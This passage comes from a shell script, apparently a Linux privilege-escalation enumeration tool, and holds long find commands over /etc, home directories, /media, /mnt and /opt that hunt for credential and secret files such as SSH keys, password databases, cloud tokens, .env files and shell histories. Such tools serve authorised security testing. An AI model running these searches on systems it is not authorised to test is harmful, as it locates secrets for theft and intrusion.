\"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"*knockd*\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"exports\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"ssh*config\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib -name \"*.socket\" -o -name \"log4j-core*.jar\" -o -name \"rocketchat.service\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"log4j-core*.jar\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"log4j-core*.jar\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"sess_*\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"log4j-core*.jar\" -o -name \"influxdb.conf\" -o -name \"*.kdbx\" -o -name \"SAM\" -o -name \"*.db\" -o -name \"Dockerfile\" -o -name \"accessTokens.json\" -o -name \"*.sqlite\" -o -name \".google_authenticator\" -o -name \"KeePass.ini\" -o -name \"jetty-realm.properties\" -o -name \"authorized_keys\" -o -name \"software\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"*.cer\" -o -name \"server.xml\" -o -name \"*.gpg\" -o -name \".github\" -o -name \"passwd\" -o -name \"sites.ini\" -o -name \"unattend.inf\" -o -name \"rocketchat.service\" -o -name \"mariadb.cnf\" -o -name \".profile\" -o -name \"iis6.log\" -o -name \".gitconfig\" -o -name \".ldaprc\" -o -name \"zabbix_server.conf\" -o -name \"*.psk\" -o -name \"protecteduserkey.bin\" -o -name \".msmtprc\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"pgsql.conf\" -o -name \".recently-used.xbel\" -o -name \"system.sav\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \".bashrc\" -o -name \"hostapd.conf\" -o -name \"*.swp\" -o -name \".htpasswd\" -o -name \".sudo_as_admin_successful\" -o -name \".pypirc\" -o -name \"redis.conf\" -o -name \"datasources.xml\" -o -name \"ws_ftp.ini\" -o -name \"cesi.conf\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"AzureRMContext.json\" -o -name \"known_hosts\" -o -name \"ddclient.conf\" -o -name \"recentservers.xml\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"Ntds.dit\" -o -name \".k5login\" -o -name \"appcmd.exe\" -o -name \"printers.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"config.php\" -o -name \"krb5.conf\" -o -name \"wp-config.php\" -o -name \"ffftp.ini\" -o -name \"ipsec.secrets\" -o -name \"unattend.txt\" -o -name \"credentials\" -o -name \"error.log\" -o -name \"*.crt\" -o -name \".env\" -o -name \"tomcat-users.xml\" -o -name \"*config*.php\" -o -name \"*.csr\" -o -name \"*.keyring\" -o -name \"drives.xml\" -o -name \"winscp.ini\" -o -name \"id_rsa*\" -o -name \"access_tokens.db\" -o -name \"docker-compose.yml\" -o -name \"sentry.conf.py\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"sssd.conf\" -o -name \"rsyncd.secrets\" -o -name \".git-credentials\" -o -name \"TokenCache.dat\" -o -name \"settings.php\" -o -name \"*vnc*.xml\" -o -name \"psk.txt\" -o -name \"*.pfx\" -o -name \"passbolt.php\" -o -name \"wsl.exe\" -o -name \"php.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"access_tokens.json\" -o -name \"https.conf\" -o -name \"web*.config\" -o -name \"snmpd.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"ftp.config\" -o -name \"kibana.y*ml\" -o -name \"000-default.conf\" -o -name \"db.php\" -o -name \"legacy_credentials.db\" -o -name \"scheduledtasks.xml\" -o -name \"SYSTEM\" -o -name \"ipsec.conf\" -o -name \"*.socket\" -o -name \"storage.php\" -o -name \"*.pem\" -o -name \"*.viminfo\" -o -name \".wgetrc\" -o -name \".lesshst\" -o -name \"RDCMan.settings\" -o -name \"credentials.db\" -o -name \"default.sav\" -o -name \".vault-token\" -o -name \"AppEvent.Evt\" -o -name \"gitlab.rm\" -o -name \"*.rdg\" -o -name \"gvm-tools.conf\" -o -name \"docker.sock\" -o -name \"*.jks\" -o -name \"wcx_ftp.ini\" -o -name \".secrets.mkey\" -o -name \"fastcgi_params\" -o -name \"id_dsa*\" -o -name \"KeePass.config*\" -o -name \"*.timer\" -o -name \"kcpassword\" -o -name \"index.dat\" -o -name \"mongod*.conf\" -o -name \"gitlab.yml\" -o -name \"postgresql.conf\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.gnupg\" -o -name \"autologin.conf\" -o -name \"setupinfo\" -o -name \"backup\" -o -name \"*.p12\" -o -name \"debian.cnf\" -o -name \"cloud.cfg\" -o -name \"ConsoleHost_history.txt\" -o -name \"setupinfo.bak\" -o -name \"*credential*\" -o -name \"kadm5.acl\" -o -name \"my.cnf\" -o -name \".erlang.cookie\" -o -name \"SecEvent.Evt\" -o -name \"*vnc*.txt\" -o -name \"mosquitto.conf\" -o -name \"*.sqlite3\" -o -name \"*.ftpconfig\" -o -name \"unattended.xml\" -o -name \"*vnc*.ini\" -o -name \"*.der\" -o -name \"secrets.ldb\" -o -name \"docker.socket\" -o -name \"groups.xml\" -o -name \"httpd.conf\" -o -name \"unattend.xml\" -o -name \"racoon.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"*_history*\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \".git\" -o -name \"*.pgp\" -o -name \"autologin\" -o -name \"backups\" -o -name \"filezilla.xml\" -o -name \"authorized_hosts\" -o -name \"NetSetup.log\" -o -name \"software.sav\" -o -name \"creds*\" -o -name \"ntuser.dat\" -o -name \"security.sav\" -o -name \"azureProfile.json\" -o -name \"access.log\" -o -name \".rhosts\" -o -name \"pagefile.sys\" -o -name \"https-xampp.conf\" -o -name \"pgadmin*.db\" -o -name \"*.keystore\" -o -name \"sysprep.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"KeePass.enforced*\" 